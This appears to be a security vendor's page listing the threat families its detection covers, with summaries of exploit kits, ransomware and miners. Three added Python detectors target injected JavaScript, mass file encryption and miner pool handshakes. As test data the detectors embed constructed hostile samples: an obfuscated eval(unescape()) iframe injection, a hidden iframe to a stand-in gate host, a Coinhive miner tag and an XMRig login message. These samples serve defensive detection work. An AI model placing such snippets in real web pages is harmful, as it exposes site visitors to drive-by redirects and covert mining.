CYBER ADAPT DETECTION CAPABILITIES
Delivering Industry Leading Cybersecurity Detection Solutions
At CyberAdapt we leave no stone unturned in providing up-to-date, relevant detections for an ever-evolving threat landscape. We source detections from reputable third parties, open-source feeds, dark web investigations, machine learning, emerging-threat research and our own custom detection writing. Combining these sources with anomaly detection, heuristics and behavioral analytics lets our platform catch threats, including zero-day threats, early in their life cycle. Below are some examples of the types of threats CyberAdapt is apt to detect in your environment.
Trojans and Viruses
A trojan is malicious software that looks legitimate but, once run, can take control of your computer; it is designed to damage, disrupt, steal or otherwise inflict harm on your data or network. A computer virus is malicious code written to alter the way a computer operates and designed to spread from one computer to another, typically by attaching itself to other programs or files.
Microsoft Tech Support Scam Landing Pages
Tech support scams are an industry-wide problem in which scammers use scare tactics, often a fake Microsoft-branded warning page, to trick users into paying for unnecessary technical support services that supposedly fix contrived device, platform or software problems.
WordPress Plugin Cross-Site Scripting
Cross-site scripting (XSS) is a web application vulnerability in which attacker-supplied script is returned to, and executed in, a site visitor's browser in the security context of the vulnerable site. Vulnerable WordPress plugins are a common source of such flaws.
FakeAV Landing Pages
Fake Anti-Virus (FakeAV) software masquerades as a legitimate security product in order to deceive victims into paying a registration fee to remove malware that was never there. Google's analysis of 240 million web pages collected by its malware detection infrastructure over a 13-month period found more than 11,000 domains involved in FakeAV distribution.
Malicious JavaScript
Malicious JavaScript needs no further user interaction to infect a machine: a user can be infected simply by browsing to a compromised or vulnerable website (a drive-by download). A study of 133k websites found that 37% of them include at least one JavaScript library with a known vulnerability. JavaScript is the de facto standard for client-side code on the Web, yet it is also notorious for security weaknesses, and third-party modules such as advertising, trackers, social media and other widgets, which are commonly embedded via JavaScript, widen the attack surface further.
"Our team recently found a malicious JavaScript injection within the WordPress index.php theme file on a compromised WordPress website which ultimately redirects site visitors to a survey-for-gifts scam website. At the time of writing, we have seen over two thousand new infected sites since we started tracking this infection." - Luke Leal, Sucuri Blog
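One way to triage injected scripts of the kind described in the Sucuri quote above and in the malicious JavaScript paragraph is to score each script body on obfuscation and redirect indicators. The following Python is an added example, not CyberAdapt's detection logic or Sucuri's code; the rules, weights, entropy threshold and sample scripts are assumptions constructed for illustration.

```python
"""Heuristic triage of injected JavaScript (added example, not CyberAdapt's code).

Scores a script on indicators common to injections found on compromised sites:
runtime code evaluation, decoder calls, long escaped byte runs, hidden iframes
and off-site redirects. Rules, weights and thresholds are illustrative assumptions.
"""
import math
import re
from collections import Counter

# (name, pattern, weight); each rule's count is capped so one feature cannot dominate.
RULES = [
    ("eval_like", re.compile(r"\b(?:eval|Function|setTimeout|setInterval)\s*\("), 2),
    ("decoder", re.compile(r"\b(?:unescape|atob|String\.fromCharCode|decodeURIComponent)\b"), 2),
    ("escaped_run", re.compile(r"(?:\\x[0-9a-f]{2}){8,}|(?:%[0-9a-f]{2}){8,}", re.I), 3),
    ("hidden_iframe", re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*[\"']?0|display\s*:\s*none", re.I), 3),
    ("redirect", re.compile(r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*[\"']https?://", re.I), 2),
    ("write_script", re.compile(r"document\.write\s*\(.*?<script", re.I | re.S), 2),
]
ENTROPY_THRESHOLD = 5.2   # bits/char; assumption: hand-written JS usually sits well below this
LONG_TOKEN = 200          # a single whitespace-free token longer than this is usually an encoded blob


def shannon_entropy(text: str) -> float:
    """Bits per character of the text; encoded or packed payloads score higher than plain code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def score_script(js: str) -> dict:
    """Return the heuristic score plus the indicators that fired."""
    hits = {name: len(rx.findall(js)) for name, rx, _ in RULES}
    score = sum(weight * min(hits[name], 3) for name, _, weight in RULES)
    entropy = shannon_entropy(js)
    longest = max((len(tok) for tok in js.split()), default=0)
    if entropy > ENTROPY_THRESHOLD:
        score += 2
    if longest > LONG_TOKEN:
        score += 2
    return {
        "score": score,
        "hits": {k: v for k, v in hits.items() if v},
        "entropy": round(entropy, 2),
        "longest_token": longest,
    }


def is_suspicious(js: str, threshold: int = 5) -> bool:
    return score_script(js)["score"] >= threshold


def triage(pages: dict) -> list:
    """Names of the pages whose script body crosses the threshold."""
    return [name for name, js in pages.items() if is_suspicious(js)]


# Constructed samples (not real captures).
BENIGN = """
document.addEventListener('DOMContentLoaded', function () {
  var btn = document.getElementById('subscribe');
  btn.addEventListener('click', function () { fetch('/api/subscribe', {method: 'POST'}); });
});
"""
# Percent-encoded document.write('<iframe width=0 height=0>') fed through eval(unescape()).
INJECTED = ('eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72'
            '%61%6d%65%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%3e%27%29"));')
HIDDEN_IFRAME = ('document.write(\'<iframe src="http://gate.example/" width=0 height=0 '
                 'style="display:none"></iframe>\');')


if __name__ == "__main__":
    for name, js in {"benign": BENIGN, "injected": INJECTED, "hidden_iframe": HIDDEN_IFRAME}.items():
        print(name, score_script(js))
```

A single weak indicator (one redirect, one `setTimeout`) does not cross the threshold by design; injections are caught by the combination of decoder calls, escaped byte runs and hidden frames. In production the scores would be tuned against a corpus of the site's own legitimate scripts, since minified bundles also produce long tokens and high entropy.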
Exploits and Malware
An exploit is code or a program that takes advantage of a vulnerability in an application or system to make it behave in a way its designers did not intend. Malware is malicious software used for activity such as corrupting a system, demanding a ransom or stealing sensitive data.
Nuclear
Exploit kits are automated tools, popular with cybercriminals, for silently exploiting vulnerabilities on victims' machines while they browse the web; the goal is to download and execute some form of malware. Nuclear is an exploit kit that fingerprints the operating system, web browser and browser plugins for vulnerable versions and then launches an exploit specific to the vulnerability it identifies.
Underminer
Underminer is an exploit kit used to infect systems with a cryptocurrency-mining malware called Hidden Mellifera. Underminer uses RSA encryption to protect its exploit code and to prevent captured traffic from being replayed, which hides its malicious content from analysts. Underminer demonstrates the persistence and continued evolution of exploit kits even though they are no longer the go-to tool for cybercriminals.
SunDown
What makes SunDown a particularly relevant threat is its capability for fileless infection, achieved through a PowerShell loader. The upgraded loader in this new version can also collect a profile of the victim's environment and send it to the exploit kit server.
Rig
An exploit kit such as Rig usually starts with a threat actor compromising a website and injecting a malicious script that eventually redirects would-be victims to the exploit kit's landing page.
Magnitude
Magnitude gained increased public attention after the kit was used in a malvertising attack on Yahoo. Criminals purchased ad space on Yahoo and used the ads to redirect visitors to domains hosting the Magnitude landing page, from which the kit attempted to exploit vulnerabilities in Java in order to deliver malware.
Fallout
The Fallout exploit kit, first spotted by the nao_sec research team, continues to infect users by weaponizing itself with exploits hosted on GitHub. Most notably, it has been using the recent Adobe Flash Player exploit, CVE-2018-15982.
Hunter
The Hunter exploit kit targets victims who visit malicious websites, using vulnerabilities in Microsoft, Oracle and Adobe products. Hunter comes with a lower price tag than previously well-known EKs; this low-end tool with the potential for a high return makes it very attractive to cybercriminals looking to capitalize on known vulnerabilities.
Ransomware
Malicious software designed to block access to a computer system or its data, typically by encrypting files, until a sum of money is paid.
CryptoWall
CryptoWall is a highly destructive ransomware family for Microsoft Windows that holds the user's data hostage using RSA-2048 encryption.
TeslaCrypt
TeslaCrypt was a ransomware trojan. It is now defunct: its developers shut it down in May 2016 and released the master decryption key.
Buran
Buran is a ransomware-as-a-service (RaaS) offering built on the VegaLocker malware strain; it competes with other RaaS operations by charging affiliates discounted rates.
Chimera
Chimera ransomware is distributed through malicious Dropbox links in phishing campaigns. Once installed, it encrypts both local and network files, and it also attempts extortion by threatening to publish the victim's data if the ransom is not paid.
WannaCry
The WannaCry attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running Microsoft Windows, encrypting data and demanding ransom payments in Bitcoin. It propagated through EternalBlue, an exploit for a vulnerability in SMBv1 (patched by Microsoft in MS17-010) that was developed by the United States National Security Agency (NSA) and later leaked.
Petya
Petya is a family of encrypting malware first discovered in 2016. It targets Microsoft Windows systems, infecting the master boot record to execute a payload that encrypts the hard drive's file system table and prevents Windows from booting.
Troldesh
Troldesh, which has been around since 2014, is typically spread by malspam, specifically malicious email attachments. The attachments are usually zip files presented to the recipient as something that "has to" be opened quickly. The extracted file is a JavaScript downloader that fetches the malicious payload (the ransomware itself), which is often hosted on sites running a compromised Content Management System (CMS).
GandCrab
First observed in January 2018, GandCrab is ransomware that encrypts victims' files and demands a ransom payment for the key needed to regain access to the data. GandCrab targets both consumers and businesses running Microsoft Windows.
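Every family in this section ends the same way on the endpoint: one process rewrites many user files with high-entropy content and/or renames them to a foreign extension in a short burst, which is what behavioral ransomware detection keys on. The following Python is an added example, not CyberAdapt's detection logic; the event format, thresholds, paths and sample events are assumptions constructed for illustration.

```python
"""Behavioural detection of mass file encryption (added example, not CyberAdapt's code).

Flags a process once it touches MIN_FILES distinct files inside WINDOW_S seconds
either by writing high-entropy data (ciphertext) or by renaming them to a new
extension. The event format, thresholds and sample events are assumptions.
"""
import hashlib
import math
import os
from collections import Counter, defaultdict

WINDOW_S = 10.0          # sliding window, seconds
MIN_FILES = 8            # distinct files touched suspiciously inside the window
ENTROPY_THRESHOLD = 7.0  # bits/byte; ciphertext and random data sit near 8.0, documents far lower


def byte_entropy(data: bytes) -> float:
    """Shannon entropy of the written bytes, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def suspicious_touches(events):
    """Yield (timestamp, path) for high-entropy writes and extension-changing renames.

    events: iterable of (timestamp_s, pid, op, path, data) where op is 'write'
    (data = bytes written) or 'rename' (path = 'old->new', data = b'').
    """
    for ts, _pid, op, path, data in events:
        if op == "write" and byte_entropy(data) >= ENTROPY_THRESHOLD:
            yield ts, path
        elif op == "rename":
            old, new = path.split("->", 1)
            if os.path.splitext(old)[1] != os.path.splitext(new)[1]:
                yield ts, old


def detect(events):
    """Return one alert per process whose suspicious touches reach MIN_FILES distinct files in a window."""
    by_pid = defaultdict(list)
    for ev in events:
        by_pid[ev[1]].append(ev)
    alerts = []
    for pid, evs in by_pid.items():
        touches = sorted(suspicious_touches(sorted(evs, key=lambda e: e[0])))
        in_window = Counter()   # path -> occurrences inside the current window
        start = 0
        for ts, path in touches:
            in_window[path] += 1
            while ts - touches[start][0] > WINDOW_S:   # slide the window's left edge forward
                old_path = touches[start][1]
                in_window[old_path] -= 1
                if in_window[old_path] == 0:
                    del in_window[old_path]
                start += 1
            if len(in_window) >= MIN_FILES:
                alerts.append({"pid": pid, "files": len(in_window),
                               "window": (touches[start][0], ts)})
                break
    return alerts


def constructed_events():
    """Constructed sample: a benign editor plus a process that encrypts and renames 12 documents."""
    text = b"Quarterly report: revenue grew 4% year on year. " * 40
    # Deterministic high-entropy stand-in for ciphertext (chained SHA-256 digests).
    blob = b"".join(hashlib.sha256(str(i).encode()).digest() for i in range(64))
    events = [
        (0.0, 1200, "write", "C:/Users/alice/Documents/notes.docx", text),
        (5.0, 1200, "write", "C:/Users/alice/Documents/budget.xlsx", text),
        (30.0, 1200, "rename", "C:/Users/alice/Documents/draft.docx->C:/Users/alice/Documents/final.docx", b""),
    ]
    for i in range(12):
        doc = f"C:/Users/alice/Documents/report{i}.docx"
        events.append((100.0 + i * 0.25, 6666, "write", doc, blob))
        events.append((100.1 + i * 0.25, 6666, "rename", f"{doc}->{doc}.locked", b""))
    return events


if __name__ == "__main__":
    for alert in detect(constructed_events()):
        print(alert)
```

The benign editor never trips the detector: its writes are low-entropy text and its one rename keeps the extension. Archivers, backup agents and full-disk encryption tools do produce bursts of high-entropy writes, so a real deployment allow-lists those binaries by signed path and keeps the extension-change signal as the stronger of the two.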
Cryptocurrency Mining
Cryptocurrency mining, or cryptomining, is the process by which transactions for a cryptocurrency are verified and added to its blockchain ledger. In the malware world, one of the most prevalent current threats is the mining botnet, in which infected systems mine cryptocurrency without their owners' knowledge and the proceeds are channeled to the botnet operator.
BitCoinMiner
Trojan.BitCoinMiner is a detection name for infections that run silently on your computer, using its CPU or GPU to mine digital currency. As the value of cryptocurrencies such as Bitcoin rises, more and more criminals want to use your computer's resources to mine them and generate revenue.
Primecoin Miner
Primecoin Miner is a client used for distributed transaction processing in the Primecoin digital currency network. Unauthorised installations of Primecoin Miner allow remote attackers to collect the mining rewards at the expense of the victim's hardware and electricity.
Monero Miner
A newer strain of Monero-mining malware contains code that hides the miner process from Task Manager, making the stolen CPU time harder for victims to notice.
XMRig Miner
XMRig is an open-source Monero CPU miner first released in 2017. Although it is a legitimate tool, threat actors routinely bundle modified copies of it into malware, and attackers who compromise vulnerable Windows, IIS and Linux servers frequently deploy XMRig on them to mine Monero.
Coinhive Miner
Multiple security firms identified the cryptocurrency mining service Coinhive as the top malicious threat to web users, because Coinhive's JavaScript miner is so often planted on hacked websites to steal the processing power of visitors' devices.
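The miners in this section share a network fingerprint: XMRig and its derivatives open a pool connection with a JSON-RPC `login` carrying an `agent` string, Stratum v1 miners send `mining.subscribe` with the miner name as the first parameter, and Coinhive-style browser miners announce themselves by script name and API calls in page content. The following Python is an added example, not CyberAdapt's rules; the sample payloads, pool port list, wallet placeholder and IP addresses are constructed assumptions.

```python
"""Spotting miner check-ins in captured flows and pages (added example, not CyberAdapt's rules).

Pool handshakes are newline-delimited JSON, so parsing the first line of a TCP
payload is enough to classify a flow; browser miners are matched on script markers.
Sample payloads, the pool port list and the wallet string are constructed.
"""
import json
from typing import Optional

KNOWN_MINER_AGENTS = ("xmrig", "xmr-stak", "cpuminer", "ccminer", "cgminer", "minerd")
STRATUM_METHODS = {"login", "submit", "keepalived", "getjob",
                   "mining.subscribe", "mining.authorize", "mining.submit"}
# Ports pools commonly listen on (assumption; used only as a corroborating signal, never alone).
COMMON_POOL_PORTS = {3333, 3334, 4444, 5555, 7777, 9999, 14433, 14444}
BROWSER_MINER_MARKERS = ("coinhive.min.js", "CoinHive.Anonymous(", "CoinHive.User(", "authedmine.min.js")


def classify_payload(payload: bytes) -> Optional[dict]:
    """Parse the first line of a TCP payload; return a verdict if it is a miner handshake."""
    try:
        msg = json.loads(payload.split(b"\n", 1)[0].decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    method, params = msg["method"], msg.get("params")
    agent = wallet = None
    if isinstance(params, dict):                 # XMRig style: {"login": wallet, "pass": ..., "agent": ...}
        agent, wallet = params.get("agent"), params.get("login")
    elif isinstance(params, list) and params:    # Stratum v1: subscribe carries the agent, authorize the worker
        if method == "mining.subscribe":
            agent = params[0]
        elif method == "mining.authorize":
            wallet = params[0]
    known = bool(agent) and any(k in str(agent).lower() for k in KNOWN_MINER_AGENTS)
    return {"method": method, "agent": agent, "wallet": wallet, "known_miner_agent": known}


def scan_flows(flows) -> list:
    """flows: iterable of (src_ip, dst_ip, dst_port, first_payload_bytes). Returns one alert per miner flow."""
    alerts = []
    for src, dst, dport, payload in flows:
        verdict = classify_payload(payload)
        if verdict is None:
            continue
        verdict.update(src=src, dst=dst, dport=dport, pool_port=dport in COMMON_POOL_PORTS)
        alerts.append(verdict)
    return alerts


def browser_miner_markers(html: str) -> list:
    """Return the Coinhive-style markers present in a page body (case-insensitive)."""
    lowered = html.lower()
    return [m for m in BROWSER_MINER_MARKERS if m.lower() in lowered]


# Constructed sample payloads (the wallet is a placeholder, not a real address).
XMRIG_LOGIN = (b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4constructedwallet",'
               b'"pass":"x","agent":"XMRig/6.16.4","algo":["rx/0","cn/r"]}}\n')
STRATUM_SUBSCRIBE = b'{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}\n'
HTTP_GET = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
OTHER_JSONRPC = b'{"jsonrpc":"2.0","id":1,"method":"eth_blockNumber","params":[]}\n'
SAMPLE_FLOWS = [
    ("10.0.0.15", "203.0.113.9", 14444, XMRIG_LOGIN),
    ("10.0.0.22", "203.0.113.10", 3333, STRATUM_SUBSCRIBE),
    ("10.0.0.22", "198.51.100.7", 80, HTTP_GET),
    ("10.0.0.30", "203.0.113.11", 8545, OTHER_JSONRPC),
]
INFECTED_PAGE = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                 '<script>var m = new CoinHive.Anonymous("sitekey"); m.start();</script>')


if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
    print(browser_miner_markers(INFECTED_PAGE))
```

The `agent` string is attacker-controlled and is often blanked in repackaged miners, which is why the verdict also records the method and whether the port is a common pool port; a `login` to port 14444 with an empty agent still deserves a look. Pools reached over TLS hide the handshake entirely, so that case falls back to destination reputation and the sustained CPU usage of the host.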